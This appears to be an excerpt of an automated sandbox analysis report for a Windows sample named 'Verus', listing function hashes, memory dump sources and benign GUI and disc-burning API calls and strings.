Instruction Fuzzy Hash: 30613670510189AFCB44EF29C890AAA3BA2FF89355F14C16EFD298F245C239E750DF94

Function 004A62ED Relevance: .1, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f57591a6c752f4fc80a12f54123fde27ab5aa5b6e124774d02a8c53baae94e
Instruction ID: 603f4aa111d3d6fba333fba5ed883132ec945425e72d7ca6783f67a6e86d324d
Opcode Fuzzy Hash: e6f57591a6c752f4fc80a12f54123fde27ab5aa5b6e124774d02a8c53baae94e
Instruction Fuzzy Hash: 79410B379503214FD708EFBADD8B45A3E52A7A0304386A63ED406FB366CF38490967C5

Function 004A632F Relevance: .1, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f3eca46945fcab6e2664abfb69a3bfe4f5e55deb0e64bc1c54f80dab338bbe6
Instruction ID: 420e23d376ae5a09d404b4ac7fd22c74cea6320a91e4acc6172e007aa66e8f20
Opcode Fuzzy Hash: 3f3eca46945fcab6e2664abfb69a3bfe4f5e55deb0e64bc1c54f80dab338bbe6
Instruction Fuzzy Hash: 5E412B379503244F9708EFBBED8B45E3E52A7A0305386922ED806F7366DF38490A67C5

Function 00B92160 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
Instruction ID: c8aee335af5c301d874d516f2a0dc8f560609e55a90f528746eec7bc44d592b3
Opcode Fuzzy Hash: f8c059e43be4a535d708b4a621a60a8cc57f347d2bb58e3ec555c5304d794362
Instruction Fuzzy Hash: 8F313831A493109FCB108F19D8817ABF7E4EBD6714F14897CE8D49B392C3799D468B92

Function 00B51303 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: f60ecd1e1d6ca75e84ef8878fc644caae3614cae7bf0ca344a0ae29fe12b758a
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: 54519074E00209DFCB08CF88C590AAEB7B2FF88315F248599D815AB355D731AE95DFA4

Function 00B70050 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b3b5202de4c7570505a626a63e6b710723205e9e0a36209e82139f88ac7e7c4
Instruction ID: 27ad8a9d56b8d4aeef42ecc2779f08ad216508eb8a83c95b80b8d4420ad511d4
Opcode Fuzzy Hash: 7b3b5202de4c7570505a626a63e6b710723205e9e0a36209e82139f88ac7e7c4
Instruction Fuzzy Hash: 7321DBB2A183089BD710BF68DC8576777D8DB62324F05857AE8A8D7391F676D804C391

Function 00B614B3 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e09fecb04be6a26a07ca45d5a70474ea56404f78d07cc65b01405c75d7e536
Instruction ID: 1660095bfad18c5031ee57b514d464215e82d66cda00bd0902b47c76abf16bf2
Opcode Fuzzy Hash: 30e09fecb04be6a26a07ca45d5a70474ea56404f78d07cc65b01405c75d7e536
Instruction Fuzzy Hash: A1112C7BAC67184FD3118EA9C8C4591B3A3EBF3216B1DC5B5C4459B215E5B9900AC710

Function 00B922C0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
Instruction ID: 7eeb8e827fef954792e3348d027679ae11de911f3ecbf4706581c6387240b3cd
Opcode Fuzzy Hash: d54bd6890c34b4c4784bed1e370f35d3f2d488265aca28555433554b9eb81ed0
Instruction Fuzzy Hash: 90016B31B493046BCB245F15EC8167F73E6EBC2B05F2884B8D4C81B10AC23D8D1287A5

Function 00B51302 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: a4790fbc4924a99e456a914a1ad4197e98527322c4b524bdb15a31a79189ecc1
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: 013190B4E00209DFCB08CF98C590AAEBBB1FF48314F248599D815AB345D735AA86CF94

Function 00B7D460 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10b6db0e46a21d2e7c95a5163266be61d3d0ca80e751293dbc9e31aa5515ccad
Instruction ID: ee0962a32bb2701c653391eee4c929516ee9e4402e9d548af9fdae4f47795d26
Opcode Fuzzy Hash: 10b6db0e46a21d2e7c95a5163266be61d3d0ca80e751293dbc9e31aa5515ccad
Instruction Fuzzy Hash: FB015AB04093499FD300AF26C49676BBBF8AB82758F60096CF1E147285D3B98409CB96

Function 00B51063 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: cb13711c9009d31709ffc73c5e481a4d349ef16c72e8253a09ab896960185416
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: 0F01E434A11148EFCB14DF98C284BACB7F2FB44311F6486D9D801AB380C371AE86DB80

Function 00B61566 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b762df6b946add33c8a07fbdf58f8ba93535ce19c65dbda044d14d977b7c93
Instruction ID: 5e0d82a2c0569afcaada2252531cf4de369bcd51c51186347dfb077538eaafdd
Opcode Fuzzy Hash: c9b762df6b946add33c8a07fbdf58f8ba93535ce19c65dbda044d14d977b7c93
Instruction Fuzzy Hash: 3DF09A74605B409BD3218F24CC90BA7BBF4FB0A304F141A2CE9C667592E360F809C71C

Function 00B702E3 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2123335489.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_Verus.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
Instruction ID: abce6bc377c01d912282c56a9a936288e6771b9c49b87d743a842a1252780693
Opcode Fuzzy Hash: bb8a45a0f10526e0d20210d5510e31f851a89abbb4eb8b5f4c554dc639634a30
Instruction Fuzzy Hash: EBC04C75D48200AAD5049F00DD41B35B7B99B87604F106439F54967561D631D814971D

Function 00422920 Relevance: 82.6, APIs: 45, Strings: 2, Instructions: 364
stringtimewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetParent.USER32(?), ref: 00422964

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,000003FE), ref: 0042299A
LoadLibraryW.KERNEL32(shell32.dll,00000092,00000000,?,000003FE), ref: 004229AA
LoadIconW.USER32(00000000), ref: 004229B1
SendMessageW.USER32(00000000,00000170,00000000), ref: 004229BE
GetDlgItem.USER32(?,000003FD), ref: 004229D3
lstrlenW.KERNEL32(00000000,?,000003FD,?,000003FE), ref: 004229E0
GetWindowTextW.USER32(00000000,?,000000FE), ref: 004229F7
lstrcatW.KERNEL32(?,004C4ECC,?,000003FD,?,000003FE), ref: 00422A10
lstrcatW.KERNEL32(?,00000000,?,000003FD,?,000003FE), ref: 00422A23
GetDlgItem.USER32(?,000003FD), ref: 00422A2D
SetWindowTextW.USER32(00000000,?), ref: 00422A3E
SHGetFileInfoW.SHELL32(-00000418,00000000,?,000002B4,00000110), ref: 00422A5D
GetDlgItem.USER32(?,000003FF), ref: 00422A6F
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00422A81
GetDlgItem.USER32(?,000004B7), ref: 00422AB0
SetWindowTextW.USER32(00000000,?), ref: 00422ABB
lstrlenW.KERNEL32(00000000,000004B7), ref: 00422ACB
lstrcpyW.KERNEL32(00000000,004C4EC8), ref: 00422AF5
lstrcatW.KERNEL32(00000000,00000000), ref: 00422B0A
lstrcatW.KERNEL32(00000000, 'dddd',' dd MMMM yyyy), ref: 00422B16
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00422B34
FileTimeToSystemTime.KERNEL32(?,?), ref: 00422B44
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000100), ref: 00422B64
GetDlgItem.USER32(?,000004B8), ref: 00422B72
SetWindowTextW.USER32(00000000,?), ref: 00422B7D
SHGetFileInfoW.SHELL32(00000000,00000000,?,000002B4,00000110), ref: 00422BA3
GetDlgItem.USER32(00000000,00000400), ref: 00422BB5
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00422BC7
GetDlgItem.USER32(?,000004BA), ref: 00422C1D
SetWindowTextW.USER32(00000000,?), ref: 00422C28
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00422CAC
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,000004B8), ref: 00422CBC
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000100,?,?,?,?,?,?,?,?,00000000), ref: 00422CDC
GetDlgItem.USER32(?,000004BB), ref: 00422CEA
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000110), ref: 00422D02
GetDlgItem.USER32(?,00000400), ref: 00422D14
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00422D26
GetDlgItem.USER32(?,000004BA), ref: 00422D55
SetWindowTextW.USER32(00000000,?), ref: 00422D60
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00422D7E
FileTimeToSystemTime.KERNEL32(?,?,?,000004BA,?,?,000004B8), ref: 00422D8E
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000100,?,000004BA,?,?,000004B8), ref: 00422DAE
GetDlgItem.USER32(?,000004BB), ref: 00422DBC
SetWindowTextW.USER32(00000000,?), ref: 00422DC7

Strings

shell32.dll, xrefs: 004229A3
'dddd',' dd MMMM yyyy, xrefs: 00422B10

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemTime$Window$File$Text$Date$InfoMessageSendSystemlstrcat$Format$LoadLongParentlstrlen$IconLibraryParametersRectlstrcpy
String ID: 'dddd',' dd MMMM yyyy$shell32.dll
API String ID: 4027184590-2513805855
Opcode ID: 140e5965b070a19a70fc8696271f44cdc457e7730284bde8f47d6daedb418265
Instruction ID: 25947b5d2412445ffc0ae284c1cb2c5d2363bcb15a5d492a7b1032575b6055f2
Opcode Fuzzy Hash: 140e5965b070a19a70fc8696271f44cdc457e7730284bde8f47d6daedb418265
Instruction Fuzzy Hash: 24D163B5204300AFE764DBA0DD96FBB73ECEBC8705F00491DB64A87191EA78E544CB69

Function 0041CF40 Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 322
windowlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F3), ref: 0041CF8C
GetDlgItem.USER32(?,00000417), ref: 0041CF9A
GetDlgItem.USER32(?,00000419), ref: 0041CFA8
GetDlgItem.USER32(?,000004CC), ref: 0041CFB6

Part of subcall function 0041C040: LoadImageW.USER32(?,000000F7,00000001,00000010,00000010,00000000), ref: 0041C05C
Part of subcall function 0041C040: GetDC.USER32(00000000), ref: 0041C071
Part of subcall function 0041C040: GetDeviceCaps.GDI32(00000000), ref: 0041C078
Part of subcall function 0041C040: ImageList_Create.COMCTL32(00000010,00000010,00000000,00000000,00000001), ref: 0041C091
Part of subcall function 0041C040: ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?), ref: 0041C0A1
Part of subcall function 0041C040: GetDlgItem.USER32 ref: 0041C0D5
Part of subcall function 0041C040: SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 0041C101
Part of subcall function 0041C040: GetDlgItem.USER32(?,000004B9), ref: 0041C11F
Part of subcall function 0041C040: GetWindowRect.USER32(00000000,?), ref: 0041C127
Part of subcall function 0041C040: ScreenToClient.USER32(?,?), ref: 0041C13C
Part of subcall function 0041C040: ScreenToClient.USER32(?,?), ref: 0041C14B
Part of subcall function 0041C040: GetDlgItem.USER32(?,000004B9), ref: 0041C156

LoadLibraryW.KERNEL32(shell32.dll), ref: 0041CFC7
GetSystemMetrics.USER32(0000000C), ref: 0041CFD9
GetSystemMetrics.USER32(0000000B), ref: 0041CFDE
LoadImageW.USER32(00000000,0000000C,00000001,00000000), ref: 0041CFE6
FreeLibrary.KERNEL32(00000000), ref: 0041CFF0
GetDlgItem.USER32(?,000003FE), ref: 0041CFFF
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 0041D013
SendMessageW.USER32(?,00000143,00000000,?), ref: 0041D065
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0041D074
SendMessageW.USER32(?,00000151,-00000001,00000000), ref: 0041D082
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0041D0A0
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041D0C6
EnableWindow.USER32(?,00000000), ref: 0041D0CE
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041D0DD
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041D0F5
EnableWindow.USER32(?,00000000), ref: 0041D0FD
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041D10C
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0041D124
EnableWindow.USER32(?,00000000), ref: 0041D12C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041D13B
GetParent.USER32(?), ref: 0041D141
GetDlgItem.USER32(00000000,00000001), ref: 0041D14C
EnableWindow.USER32(00000000), ref: 0041D14F
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041D160
GetActiveWindow.USER32 ref: 0041D19C
CheckDlgButton.USER32(?,00000469), ref: 0041D1E3
CheckDlgButton.USER32(?,000004AD), ref: 0041D1FA
CheckDlgButton.USER32(?,000003F7,00000000), ref: 0041D211
CheckDlgButton.USER32(?,000003F8), ref: 0041D228
CheckDlgButton.USER32(?,0000041C), ref: 0041D23F
CheckDlgButton.USER32(?,0000041D,00000000), ref: 0041D256
CheckDlgButton.USER32(?,0000041E), ref: 0041D26D
GetDlgItem.USER32(?,00000469), ref: 0041D289
EnableWindow.USER32(00000000,00000000), ref: 0041D28E
GetDlgItem.USER32(?,000004AD), ref: 0041D29F
EnableWindow.USER32(00000000,00000000), ref: 0041D2A4
SendMessageW.USER32(?,00000143,00000000,?), ref: 0041D2D3

Strings

shell32.dll, xrefs: 0041CFC2

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Item$Window$ButtonCheck$Enable$Image$Load$ClientLibraryList_MetricsScreenSystem$ActiveCapsCreateDeviceFreeIconParentRectReplace
String ID: shell32.dll
API String ID: 3043419745-3366042328
Opcode ID: d536fc917adb89079c6ca38546d2eb714874a653bd9ccf491f4883890f21b7d5
Instruction ID: c3b7c21c4e1bda8eb24974fe8493adedc38c19d9543b284bec1dcc406b1b6a05
Opcode Fuzzy Hash: d536fc917adb89079c6ca38546d2eb714874a653bd9ccf491f4883890f21b7d5
Instruction Fuzzy Hash: 9FB1C7B1780704BBE224AB75DD96F6777E8AB84B04F10481DB786962D1CAB8F840876D

Function 004266C0 Relevance: 70.3, APIs: 21, Strings: 19, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strncmp.LIBCMT ref: 004266F6
_strncmp.LIBCMT ref: 00426711
_strncmp.LIBCMT ref: 00426905
_strncmp.LIBCMT ref: 0042691C
_strncmp.LIBCMT ref: 0042695D

Strings

Inappropriate audio, xrefs: 004267B6
This version, xrefs: 00426A1A
A write error, xrefs: 00426888
sector, xrefs: 00426840
WARNING:, xrefs: 004268FF
DVD+RW has no -du, xrefs: 004269DA
Some drives do not, xrefs: 00426726
Cannot open new sess, xrefs: 004268C2
Try again, xrefs: 00426762
Could not write Lead-in., xrefs: 00426957
Data may not fit on cur, xrefs: 00426913
Cannot blank, xrefs: 0042670B
If you need, xrefs: 00426A2E
Free test, xrefs: 00426A42
No disk , xrefs: 0042679E
sector size %ld for %*[^, xrefs: 0042685B
Unsupported , xrefs: 00426829
Cannot load media., xrefs: 004266F0
Cannot init drive, xrefs: 0042699A

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp
String ID: A write error$Cannot blank$Cannot init drive$Cannot load media.$Cannot open new sess$Could not write Lead-in.$DVD+RW has no -du$Data may not fit on cur$Free test$If you need$Inappropriate audio$No disk $Some drives do not$This version$Try again$Unsupported $WARNING:$sector$sector size %ld for %*[^
API String ID: 909875538-2145317435
Opcode ID: d5ce1f92a6dc4f4a3d8db6210b20cfb0f81562364fb1d2e840352cd45964e21b
Instruction ID: dd71c6e7ed73d54eb1eb5a14d5651ba34878d94811a90ef872d4eb5a1a633238
Opcode Fuzzy Hash: d5ce1f92a6dc4f4a3d8db6210b20cfb0f81562364fb1d2e840352cd45964e21b
Instruction Fuzzy Hash: 4F91E8717407016BEA20EB209C43F7B33945F96B04F56052EFE0967382FA6DB84586AE

Function 00434400 Relevance: 65.0, APIs: 33, Strings: 4, Instructions: 276windowlibrarystringCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 0043441F
GetSystemMetrics.USER32(0000000C), ref: 00434431
GetSystemMetrics.USER32(0000000B), ref: 00434436
LoadImageW.USER32(00000000,0000000C,00000001,00000000), ref: 0043443E
FreeLibrary.KERNEL32(00000000), ref: 00434448
GetDlgItem.USER32(?,000003FE), ref: 0043445D
SendMessageW.USER32(00000000,00000170,?,00000000), ref: 00434471
lstrcatW.KERNEL32(?,?), ref: 004344CE
SetDlgItemTextW.USER32(?,000003FF,?), ref: 004344E2

Part of subcall function 00434380: SetDlgItemTextW.USER32(?,00000402,00000000), ref: 004343F0

Part of subcall function 00477440: _vswprintf_s.LIBCMT ref: 00477459

SetDlgItemTextW.USER32(?,00000403,?), ref: 00434530
SetDlgItemTextW.USER32(?,000003F0,?), ref: 0043455A
SetDlgItemTextW.USER32(?,00000406,?), ref: 0043458C
SetDlgItemTextW.USER32(?,00000408,?), ref: 004345BE
GetDlgItem.USER32(?,0000049B), ref: 004345D3
EnableWindow.USER32(00000000,00000000), ref: 004345D8
GetDlgItem.USER32(?,0000040A), ref: 004345E7
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 004345F9
GetDlgItem.USER32(?,0000040C), ref: 00434604
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 00434616
GetDlgItem.USER32(?,0000040E), ref: 00434621
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 00434634
GetDlgItem.USER32(?,0000040B), ref: 0043463F
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 00434652
GetDlgItem.USER32(?,0000040D), ref: 0043465D
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 00434670
GetDlgItem.USER32(?,00000410), ref: 0043467B
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 0043468B
GetDlgItem.USER32(?,00000411), ref: 00434696
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 004346A9
GetDlgItem.USER32(?,00000412), ref: 004346B4
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 004346C7
GetDlgItem.USER32(?,00000413), ref: 004346D2
SendMessageW.USER32(00000000,000000F1,?,00000000), ref: 004346E5

Strings

shell32.dll, xrefs: 00434418
(%C:), xrefs: 004344B6
%d kB/s (CD: %dx, DVD: %dx), xrefs: 00434570, 004345A2
%d kB, xrefs: 0043453E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$MessageSend$Text$LibraryLoadMetricsSystem$EnableFreeImageWindow_vswprintf_slstrcat
String ID: (%C:)$%d kB$%d kB/s (CD: %dx, DVD: %dx)$shell32.dll
API String ID: 33856340-1717168773
Opcode ID: 579d89073530974a9d48a9122a76f5c49448298836a5f4ff2e86e5536ecf49fc
Instruction ID: 1fad03cd2e3eb8e2566b673f8b872e259c3967fcfd56d2390a596a8a12a4d28e
